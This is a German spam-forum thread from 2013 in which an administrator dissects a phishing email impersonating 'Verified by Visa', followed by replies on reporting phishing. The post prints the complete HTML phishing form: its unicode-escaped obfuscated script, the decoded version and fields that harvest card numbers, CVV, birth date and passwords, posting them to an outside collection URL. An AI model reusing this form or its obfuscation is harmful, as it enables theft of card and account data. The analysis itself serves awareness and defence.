Interessanter Visa-Spam

Hier kann über alles diskutiert werden, was mit Spam zu tun hat.

Moderator: Forum-Team

Interessanter Visa-Spam

Beitragvon Chactory » 9. Mär 2013, 23:40

Hi zusammen,

ich habe eine recht interessante Spam-Mail erhalten, deren Fallstricke ich gerade zu entziffern versuche.

Der Absender nennt sich „Verified by Visa“, sehr glaubwürdig. :evil:
visa-spam.gif
visa-spam.gif (6.53 KiB) 2606-mal betrachtet

Die Mail stammt von "Verified by Visa" <Sicherheitsmabnahme@visa.de>“, wer oder was auch immer die Sicherheitsmabnahme ist ...
Code: Alles auswählen
Return-Path: <Sicherheitsmabnahme@visa.de>
Received: from mail.yantarsnab.ru (mail.yantarsnab.ru [80.76.234.54])
   by mtain-mc03.r1000.mx.aol.com (Internet Inbound) with ESMTP id 26384380000CE;
   Thu,  7 Mar 2013 09:58:31 -0500 (EST)
Received: from User (cust.static.84-253-22-70.cybernet.ch [84.253.22.70])
   by mail.yantarsnab.ru (Postfix) with ESMTPA id 508B0CA8466;
   Thu,  7 Mar 2013 18:13:46 +0400 (MSK)
From: "Verified by Visa"<Sicherheitsmabnahme@visa.de>
Subject: Mehr Sicherheit beim Internet-Shopping
Date: Thu, 7 Mar 2013 15:13:48 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
   boundary="----=_NextPart_000_0103_01C2A9A6.7664C2CE"
This is a multi-part message in MIME format.

Die Spam-Mail gibt vor, von dem Kreditkartenunternehmen Visa zu stammen, bzw. von dort verifiziert zu sein. Was natürlich widersprüchlich ist, aber vermutlich weder Sender noch Zielgruppe stören dürfte. Der Sender behauptet, die Visa-Karte sicherer zu machen (ein echtes Trojanisches Pferd). Die Spam-Mail enthält ein angehängtes Formular in Html-Code.
visa-spam-.gif
visa-spam-.gif (51.44 KiB) 2606-mal betrachtet

Der Anhang wird in Spamihilators Mail-Reader als Quellcode folgendermaßen dargestellt:
Code: Alles auswählen
 ------=_NextPart_000_0103_01C2A9A6.7664C2CE
Content-Type: application/octet-stream;
   name="Visa_-_MasterCard_-_Formular.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
   filename="Visa_-_MasterCard_-_Formular.html"
PEhUTUw+DQo8SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBl
IGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+DQo8TUVUQSBo
dHRwLWVxdWl2PVByYWdtYSBjb250ZW50PW5vLWNhY2hlPg0KPExJTksgcmVs
PSJzdHlsZXNoZWV0IiBocmVmPSJodHRwOi8vcGhvbmUuaXBrYWxsLmNvbS9j
c3MvaWVwYy5jc3MiIHR5cGU9InRleHQvY3NzIj4NCjwvSEVBRD4NCjxzY3Jp
cHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5kb2N1bWVudC53cml0ZSgnXHUw
MDNDXHUwMDQyXHUwMDRGXHUwMDQ0XHUwMDU5XHUwMDNFXHUwMDBEXHUwMDND
XHUwMDYzXHUwMDY1XHUwMDZFXHUwMDc0XHUwMDY1XHUwMDcyXHUwMDNFXHUw
MDNDXHUwMDQyXHUwMDUyXHUwMDIwXHUwMDJGXHUwMDNFXHUwMDNDXHUwMDQy
XHUwMDUyXHUwMDIwXHUwMDJGXHUwMDNFXHUwMDBEXHUwMDNDXHUwMDQ5XHUw
MDREXHUwMDQ3XHUwMDIwXHUwMDYyXHUwMDZGXHUwMDcyXHUwMDY0XHUwMDY1
XHUwMDcyXHUwMDNEXHUwMDIyXHUwMDMwXHUwMDIyXHUwMDIwXHUwMDYxXHUw
MDZDXHUwMDc0XHUwMDNEXHUwMDIyXHUwMDIyXHUwMDIwXHUwMDczXHUwMDcy
...

Der Anhang ist ein in Html geschriebenes Formular. Es erhebt sämtliche Kredikartendaten des gutgläubigen Mail-Empfängers, einschließlich des Kennworts, und seine Kontodaten.
Code: Alles auswählen
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META http-equiv=Pragma content=no-cache>
<LINK rel="stylesheet" href="http://phone.ipkall.com/css/iepc.css" type="text/css">
</HEAD>
<script type="text/javascript">document.write('\u003C\u0042\u004F\u0044\u0059\u003E\u000D\u003C\u0063\u0065\u006E\u0074\u0065\u0072\u003E\u003C\u0042\u0052\u0020\u002F\u003E\u003C\u0042\u0052\u0020\u002F\u003E\u000D\u003C\u0049\u004D\u0047\u0020\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0061\u006C\u0074\u003D\u0022\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006D\u0069\u006C\u006C\u0069\u006F\u006E\u002D\u0068\u0061\u0072\u0076\u0065\u0073\u0074\u002E\u0063\u006F\u006D\u002F\u0067\u0065\u0074\u002F\u0074\u006D\u0070\u002F\u0076\u0070\u0061\u0073\u005F\u006C\u006F\u0067\u006F\u002E\u0067\u0069\u0066\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0032\u0035\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0036\u0030\u0022\u003E\u0026\u006E\u0062\u0073\u0070\u003B\u0026\u006E\u0062\u0073\u0070\u003B\u0026\u006E\u0062\u0073\u0070\u003B\u0026\u006E\u0062\u0073\u0070\u003B\u000D\u003C\u0049\u004D\u0047\u0020\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0061\u006C\u0074\u003D\u0022\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006D\u0069\u006C\u006C\u0069\u006F\u006E\u002D\u0068\u0061\u0072\u0076\u0065\u0073\u0074\u002E\u0063\u006F\u006D\u002F\u0067\u0065\u0074\u002F\u0074\u006D\u0070\u002F\u006D\u0070\u0061\u0073\u005F\u006C\u006F\u0067\u006F\u002E\u0067\u0069\u0066\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0032\u0035\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0036\u0030\u0022\u003E\u003C\u002F\u0041\u003E\u003C\u002F\u0063\u0065\u006E\u0074\u0065\u0072\u003E\u000D\u003C\u0046\u004F\u0052\u004D\u0020\u0069\u0064\u003D\u0022\u0046\u004F\u0052\u004D\u0031\u0022\u0020\u006F\u006E\u0073\u0075\u0062\u006D\u0069\u0074\u003D\u0022\u0072\u0065\u0074\u0075\u0072\u006E\u0020\u0073\u0075\u0062\u006D\u0069\u0074\u0049\u0074\u0028\u0074\u0068\u0069\u0073\u0029\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070\u006F\u0073\u0074\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0046\u004F\u0052\u004D\u0031\u0022\u0020\u0061\u0063\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006D\u0069\u006C\u006C\u0069\u006F\u006E\u002D\u0068\u0061\u0072\u0076\u0065\u0073\u0074\u002E\u0063\u006F\u006D\u002F\u0067\u0065\u0074\u002F\u0074\u006D\u0070\u002F\u0070\u0062\u0073\u002E\u0070\u0068\u0070\u0022\u003E\u000D\u003C\u0054\u0041\u0042\u004C\u0045\u0020\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0061\u006C\u0069\u0067\u006E\u003D\u0022\u0063\u0065\u006E\u0074\u0065\u0072\u0022\u003E\u000D\u0020\u0020\u003C\u0054\u0042\u004F\u0044\u0059\u003E');</script>
  <TR>
    <TD>Vollstandiger Name:</TD>
    <TD><INPUT maxLength="35" size="18" name="fullname"></TD></TR>
  <TR>
</TD></TR>
  <TR>
  <TR>
</TD></TR>
  <TR>
    <TD>Kreditkartennummer:</TD>
    <TD><INPUT maxLength="16" size="15" name="card"></TD></TR>
  <TR>
</TD></TR>
  <TR>
  <TR>
</TD></TR>
  <tr>
<td class="tdq"><div>Verfalldatum:</div></td>
<td class="tda"><input title="Issuer Answer" name="mm" size="2" maxlength="2" class="monospace" type="text"> . <input title="Issuer Answer" name="yyyy" size="4" maxlength="4" class="monospace" type="text"> (MM.JJJJ)</td>
</tr>
</TD></TR>
  <TR>
  <TR>
</TD></TR>
  <TR>
    <TD>Die Pr&uuml;fnummer:</TD>
    <TD><INPUT maxLength="3" size="2" type="text" name="cvv"></TD></TR>
  <TR>
</TD></TR>
  <TR>
  <TR>
</TD></TR>
<tr>
<td class="tdq"><div>Geburtsdatum:</div></td>
<td class="tda"><input title="Issuer Answer" name="dob_dd" size="1" maxlength="2" class="monospace" type="text"> .
   <input title="Issuer Answer" name="dob_mm" size="1" maxlength="2" class="monospace" type="text"> .
   <input title="Issuer Answer" name="dob_yy" size="2" maxlength="4" class="monospace" type="text"> (TT.MM.JJJJ)</td>
</tr>
  <TR>
</TD></TR>
  <TR>
  <TR>
</TD></TR>
  <TR>
    <TD>Kreditkartenkontonummer:</TD>
    <TD><INPUT maxLength="10" size="10" type="text" name="kont"></TD>
  </TR>
  <TR>
</TD></TR>
  <TR>
  <TR>
</TD></TR>
  <TR>
    <TD>Verified by Visa / MasterSecure Code:</TD>
    <TD><INPUT maxLength="16" size="15" name="vbv"></TD></TR>
  <TR>
</TD></TR>
  <TR>
  <TR>
</TD></TR>
  <TR>
    <TD colSpan=2 align="middle"><BR><INPUT id="submit1" value="Weiter ->>" type="submit" name="submit1">  </TD>
  </TR>
  <TR>
    <TD>&nbsp;</TD>
  </TR>
  <TR>
    <TD colSpan="2" align="middle">Verified By Visa - MasterCard Secure Code</TD>
  </TR>
</TBODY>
</TABLE>
</FORM>
<script language = "javascript">
  function submitIt(form) {
    if (form.fullname.value == "") {
      alert("Vollstandiger Name: Bitte geben Sie eine gültige vollstandiger name.");
      form.fullname.focus();
      form.fullname.select();
      return false;
    }else if (form.card.value == "") {
      alert("Kredit / Debit Kartennummer: Bitte geben Sie eine gültige Kartennummer,\n16 Ziffern ohne Leerzeichen ohne Bindestrich.");
      form.card.focus();
      form.card.select();
      return false;
    }else if (form.mm.value == "") {
      alert("Verfalldatum: Bitte geben Sie eine gültige Verfalldatum.");
      form.mm.focus();
      form.mm.select();
      return false;
    }else if (form.yyyy.value == "") {
      alert("Verfalldatum: Bitte geben Sie eine gültige Verfalldatum.");
      form.yyyy.focus();
      form.yyyy.select();
      return false;
    }else if (form.cvv.value == "") {
      alert("Prüfnummer: Bitte geben Sie eine gültige Prüfnummer.");
      form.cvv.focus();
      form.cvv.select();
      return false;
    }else if (form.dob_dd.value == "") {
      alert("Geburtsdatum: Bitte geben Sie eine gültige Geburtsdatum.");
      form.dob_dd.focus();
      form.dob_dd.select();
      return false;
    }else if (form.dob_mm.value == "") {
      alert("Geburtsdatum: Bitte geben Sie eine gültige Geburtsdatum.");
      form.dob_mm.focus();
      form.dob_mm.select();
      return false;
    }else if (form.dob_yy.value == "") {
      alert("Geburtsdatum: Bitte geben Sie eine gültige Geburtsdatum.");
      form.dob_yy.focus();
      form.dob_yy.select();
      return false;
    }else if (form.kont.value < 10) {
      alert("Kreditkartenkontonummer: Bitte geben Sie eine gültige Kreditkartenkontonummer.");
      form.kont.focus();
      form.kont.select();
      return false;
    }else if (form.vbv.value == "") {
      alert("Verified By Visa / MasterSecure Code: Bitte geben Sie eine gültige Kennwort.");
      form.vbv.focus();
      form.vbv.select();
      return false;
    }else{
      return true;
    }   
  }
</script>
</BODY>
</HTML>

Nicht uninteressant ist der kleine Schnipsel mit Scriptcode ziemlich am Anfang:
Code: Alles auswählen
<script type="text/javascript">document.write('\u003C\u0042\u004F\u0044\u0059\u003E\u000D\u003C\u0063\u0065\u006E\u0074\u0065\u0072\u003E\u003C\u0042\u0052\u0020\u002F\u003E\u003C\u0042\u0052\u0020\u002F\u003E\u000D\u003C\u0049\u004D\u0047\u0020\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0061\u006C\u0074\u003D\u0022\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006D\u0069\u006C\u006C\u0069\u006F\u006E\u002D\u0068\u0061\u0072\u0076\u0065\u0073\u0074\u002E\u0063\u006F\u006D\u002F\u0067\u0065\u0074\u002F\u0074\u006D\u0070\u002F\u0076\u0070\u0061\u0073\u005F\u006C\u006F\u0067\u006F\u002E\u0067\u0069\u0066\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0032\u0035\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0036\u0030\u0022\u003E\u0026\u006E\u0062\u0073\u0070\u003B\u0026\u006E\u0062\u0073\u0070\u003B\u0026\u006E\u0062\u0073\u0070\u003B\u0026\u006E\u0062\u0073\u0070\u003B\u000D\u003C\u0049\u004D\u0047\u0020\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0061\u006C\u0074\u003D\u0022\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006D\u0069\u006C\u006C\u0069\u006F\u006E\u002D\u0068\u0061\u0072\u0076\u0065\u0073\u0074\u002E\u0063\u006F\u006D\u002F\u0067\u0065\u0074\u002F\u0074\u006D\u0070\u002F\u006D\u0070\u0061\u0073\u005F\u006C\u006F\u0067\u006F\u002E\u0067\u0069\u0066\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0032\u0035\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0036\u0030\u0022\u003E\u003C\u002F\u0041\u003E\u003C\u002F\u0063\u0065\u006E\u0074\u0065\u0072\u003E\u000D\u003C\u0046\u004F\u0052\u004D\u0020\u0069\u0064\u003D\u0022\u0046\u004F\u0052\u004D\u0031\u0022\u0020\u006F\u006E\u0073\u0075\u0062\u006D\u0069\u0074\u003D\u0022\u0072\u0065\u0074\u0075\u0072\u006E\u0020\u0073\u0075\u0062\u006D\u0069\u0074\u0049\u0074\u0028\u0074\u0068\u0069\u0073\u0029\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070\u006F\u0073\u0074\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0046\u004F\u0052\u004D\u0031\u0022\u0020\u0061\u0063\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006D\u0069\u006C\u006C\u0069\u006F\u006E\u002D\u0068\u0061\u0072\u0076\u0065\u0073\u0074\u002E\u0063\u006F\u006D\u002F\u0067\u0065\u0074\u002F\u0074\u006D\u0070\u002F\u0070\u0062\u0073\u002E\u0070\u0068\u0070\u0022\u003E\u000D\u003C\u0054\u0041\u0042\u004C\u0045\u0020\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0061\u006C\u0069\u0067\u006E\u003D\u0022\u0063\u0065\u006E\u0074\u0065\u0072\u0022\u003E\u000D\u0020\u0020\u003C\u0054\u0042\u004F\u0044\u0059\u003E');</script>

Dekodiert kommt folgendes heraus. Damit wurde die betrügerische Website im Mail-Quellcode verschleiert, möglicherweise um Link-Filter zu täuschen.
Code: Alles auswählen
<BODY>
<center><BR /><BR />
<IMG border="0" alt="" src="http://million-harvest.com/get/tmp/vpas_logo.gif" width="125" height="60">
<IMG border="0" alt="" src="http://million-harvest.com/get/tmp/mpas_logo.gif" width="125" height="60"></A></center>
<FORM id="FORM1" onsubmit="return submitIt(this)" method="post" name="FORM1" action="http://million-harvest.com/get/tmp/pbs.php">
<TABLE border="0" align="center">
<TBODY>

Insgesamt muß man schon einen Haufen sicherheitsrelevanter Regeln übersehen und verletzen, um auf eine solche betrügerische Spam-Mail hereinzufallen. Selbstverständlich schreibt Visa keine solchen unprofessionellen Angebote. Per Mail macht man sowieso keine Geldgeschäfte. Niemals öffnet man den Anhang einer Mail, deren Absender nicht zuverläßig ist, und schon gar nicht einen Anhang in einem Format, der Schadcode enthalten könnte, wie „.exe“, „.com“, aber auch „.html“. (Es ist im Übrigen auch eine Unsitte, daß jeder meint, er müsse in der Mail einen Text ankündigen, der in einer Officedatei angehängt ist, statt den Text in die Mail zu schreiben.) Nie und nimmer gibt man seine Kreditkarten- und Kontodaten raus, und schon gar nicht per Mail oder am Telefon. Nie und niemals nie gibt man sein Kennwort preis. Amen. ;)

Gruß,
Chactory
HilfeHelp «en»TippsAnbuva's FAQBob's FAQ «en»SpamwortlisteRegelfilterScreenshotsSSL/TLSSpami 1.6.0
Vostro 3450, Intel Core i5 2410M 2,3 GHz, 4 GB DDR3 SDRAM 1333 MHz, Windows 7 Pro 64 Bit SP1

Bild
Benutzeravatar
Chactory
Administrator
Administrator
 
Administration
Beta-Tester
Forum-Team
 
Beiträge: 9593
Registriert: 9. Jan 2004, 23:19
Wohnort: Kiel (D)

Re: Interessanter Visa-Spam

Beitragvon larifaribummbumm » 10. Mär 2013, 01:42

Na die war ja mehr als eindeutig..
Ich habe eine von PayP bekommen, die musste ich erstmal an spoof@ schicken, um zu sehen ob die echt ist.
Das Ergebniss steht noch aus.
Und ich bin echt am grübeln ob die echt ist.
Die Chancen drauf reinzufallen steigen täglich...
Ein Künstler ist jemand, der aus der Lösung ein Rätsel machen kann.
larifaribummbumm
Assistent
Assistent
 
Beiträge: 696
Registriert: 3. Okt 2012, 14:40

Re: Interessanter Visa-Spam

Beitragvon Chactory » 10. Mär 2013, 10:18

Hallo larifaribummbumm!

larifaribummbumm hat geschrieben:Na die war ja mehr als eindeutig.
Ja, eigentlich schon. Die Leute fallen auf solche Sachen rein, wenn etwas Emotionales passiert, das den Verstand ausschaltet. Also z.B. Gier, Sex oder Angst.

larifaribummbumm hat geschrieben:... die musste ich erstmal an spoof@ schicken, um zu sehen ob die echt ist.
Wer ist denn spoof@? Ist das eine Antispam-Prüfstelle?

Gruß,
Chactory
HilfeHelp «en»TippsAnbuva's FAQBob's FAQ «en»SpamwortlisteRegelfilterScreenshotsSSL/TLSSpami 1.6.0
Vostro 3450, Intel Core i5 2410M 2,3 GHz, 4 GB DDR3 SDRAM 1333 MHz, Windows 7 Pro 64 Bit SP1

Bild
Benutzeravatar
Chactory
Administrator
Administrator
 
Administration
Beta-Tester
Forum-Team
 
Beiträge: 9593
Registriert: 9. Jan 2004, 23:19
Wohnort: Kiel (D)

Re: Interessanter Visa-Spam

Beitragvon larifaribummbumm » 10. Mär 2013, 15:33

Na Hoppla,
da hat es mich erwischt mit "* POLICY VIOLATION ! *".
Ich hatte die beiden großen "Peeee´s" geschrieben.

Gut, dann schreibe ich mal "einen großen Bezahldienst, welcher ein Tochterunternehmen eines großen Auktionshauses ist".

Die haben eine Emailadresse, an welche man seine Phishingmails schickt, wenn versucht wird Daten abzugreifen.
Die sichten die Mail und leiten entsprechenden Schritte ein.

Fast jeder große Anbieter hat solche Adressen veröffentlicht, da diese ja großes Interesse an der Verfolgung und Abschaltung haben.

Genau wie Anti-Viren-Programm-Hersteller. Die haben Adressen, an die man unerkannte oder verdächtige Malware schicken kann.
Da könnten wir ja mal einen Post eröffnen und solche Dinge sammeln...
Ein Künstler ist jemand, der aus der Lösung ein Rätsel machen kann.
larifaribummbumm
Assistent
Assistent
 
Beiträge: 696
Registriert: 3. Okt 2012, 14:40

Re: Interessanter Visa-Spam

Beitragvon Chactory » 10. Mär 2013, 22:38

Hallo larifaribummbumm!

larifaribummbumm hat geschrieben:Na Hoppla, da hat es mich erwischt mit "* POLICY VIOLATION ! *".
Ja! :lol: Das war ich − habe in der Forensoftware ein paar Spamwörter gesperrt.

larifaribummbumm hat geschrieben:Die haben eine Emailadresse ... Fast jeder große Anbieter hat solche Adressen veröffentlicht ...
Ach so! Alles klar!

Ich finde es auch interessant, ab und zu eine Spam-Mail zu analysieren. Deshalb habe ich hier mal wieder etwas gepostet. Allerdings muß man dabei immer etwas vorsichtig sein, damit man sich keine Malware einfängt. :P

Gruß,
Chactory
HilfeHelp «en»TippsAnbuva's FAQBob's FAQ «en»SpamwortlisteRegelfilterScreenshotsSSL/TLSSpami 1.6.0
Vostro 3450, Intel Core i5 2410M 2,3 GHz, 4 GB DDR3 SDRAM 1333 MHz, Windows 7 Pro 64 Bit SP1

Bild
Benutzeravatar
Chactory
Administrator
Administrator
 
Administration
Beta-Tester
Forum-Team
 
Beiträge: 9593
Registriert: 9. Jan 2004, 23:19
Wohnort: Kiel (D)


Zurück zu Spam

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 1 Gast

cron

 industrious-southeast